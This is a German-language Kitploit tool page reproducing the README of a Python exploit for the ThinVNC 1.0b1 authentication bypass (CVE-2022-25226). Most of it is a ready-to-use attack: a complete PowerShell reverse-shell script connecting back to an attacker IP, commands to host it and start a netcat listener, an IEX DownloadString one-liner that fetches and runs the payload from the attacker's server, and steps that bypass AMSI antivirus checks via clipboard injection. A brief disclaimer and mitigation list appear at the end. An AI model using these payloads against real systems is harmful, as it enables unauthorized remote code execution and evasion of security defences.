Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-25226 — Python-Exploit-Skript für ThinVNC 1.0b1 Authentifizierungsumgehung (CVE-2022-25226), das unautorisierten Zugriff auf den /cmd-Endpunkt mit AMSI-Umgehung und Zwischenablage-Injektion kombiniert, um eine Reverse-Shell zu liefern. | Kitploit
Tools/GitHubGitHub/krill-x7/cve-2022-25226
ExploitationWebanwendungs-ExploitationCommand and ControlAuthentifizierungLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubkrill-x7/cve-2022-25226

CVE-2022-25226

Python-Exploit-Skript für ThinVNC 1.0b1 Authentifizierungsumgehung (CVE-2022-25226), das unautorisierten Zugriff auf den /cmd-Endpunkt mit AMSI-Umgehung und Zwischenablage-Injektion kombiniert, um eine Reverse-Shell zu liefern.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ThinVNC 1.0b1 – Authentifizierungsumgehung zu Remotecodeausführung (CVE-2022-25226)

Autor: krill-x7
Referenz: https://fluidattacks.com/advisories/sinatra


Übersicht

ThinVNC 1.0b1 enthält eine Sicherheitslücke zur Authentifizierungsumgehung (CVE-2022-25226), die es entfernten Angreifern ermöglicht, ohne Authentifizierung mit dem Backend zu interagieren. Durch die Nutzung exponierter /cmd-Endpunkte können Angreifer Tastatureingaben simulieren, PowerShell öffnen, AMSI umgehen und beliebige Befehle ausführen – was letztendlich zu Remotecodeausführung (RCE) führt.

Dieses Skript verknüpft diese Primitive, um eine Reverse-Shell auf dem Zielsystem zu erhalten.


Haftungsausschluss

Dieser Code wird nur für Bildungszwecke bereitgestellt.
Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich zur Prüfung autorisiert sind.


Voraussetzungen

  • Python 3
  • rev.ps1 Reverse-Shell-Skript, das auf Ihrem Angreifer-Rechner gehostet wird
  • Ein Listener (z. B. Netcat) zum Abfangen der Shell

  • Verwendung

    root@kitploit:~
    python3 thinvnc_rce.py -t <TARGET_IP> -tp <TARGET_PORT> -a <ATTACKER_IP> -ap <ATTACKER_PORT>
    

    Beispiel

    root@kitploit:~
    python3 thinvnc_rce.py -t 192.168.1.100 -tp 8080 -a 192.168.1.200 -ap 8000
    

    Payload-Einrichtung

    1. rev.ps1 erstellen

    Speichern Sie dies in einer Datei namens rev.ps1.
    Wichtig: Ersetzen Sie 192.168.1.200 und 8000 durch die IP Ihres Angreifers und den Listening-Port.

    root@kitploit:~
    $client = New-Object System.Net.Sockets.TCPClient("192.168.1.200",8000);
    $stream = $client.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush()
    }
    $client.Close()
    

    2. rev.ps1 hosten

    Aus demselben Verzeichnis:

    root@kitploit:~
    python3 -m http.server 8000
    

    3. Einen Listener starten

    root@kitploit:~
    nc -lvnp 8000
    

    Exploit-Workflow

    1. Erhalten Sie eine gültige SID durch eine unauthentifizierte Anfrage an /cmd?cmd=connect.
    2. Starten Sie diese SID mit Tastatur-/Mauszugriff über /cmd?cmd=start.
    3. Senden Sie die Tastenkombination Strg+Esc, um das Startmenü zu öffnen.
    4. Starten Sie PowerShell im Bypass-Modus.
    5. Umgehen Sie AMSI, um PowerShell-Schutzmaßnahmen zu deaktivieren.
    6. Führen Sie das Reverse-Shell-Payload von Ihrem HTTP-Server aus.

    Payload-Ausführung

    Dies ist das Payload, das im Speicher ausgeführt wird:

    root@kitploit:~
    IEX((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1'))
    

    Ersetzen Sie <ATTACKER_IP> und <PORT> durch Ihre tatsächliche IP und Ihren Port.


    Hinweise

    • Das Payload wird mittels clipboard-basierter Befehlsinjektion ausgeführt.
    • Ein AMSI-Bypass ist enthalten, um PowerShell-basierte AV-Erkennungen zu umgehen.
    • ThinVNC führt PowerShell mit Standardbenutzerberechtigungen aus – wenn es als Administrator ausgeführt wird, ist die Shell erhöht.

    Gegenmaßnahmen

    • Setzen Sie ThinVNC nicht dem Internet aus.
    • Blockieren Sie den /cmd-Endpunkt über die Webserver-Konfiguration oder eine WAF.
    • Wechseln Sie zu unterstützten, sicheren Alternativen (z. B. Apache Guacamole).
    • Überwachen Sie die PowerShell-Nutzung und das Verhalten der Clipboard-Injektion.

    Danksagungen

    • Exploit und Automatisierung: krill-x7
    • Schwachstellenentdeckung und -hinweis: Fluid Attacks – Advisory Sinatra
    Tool herunterladen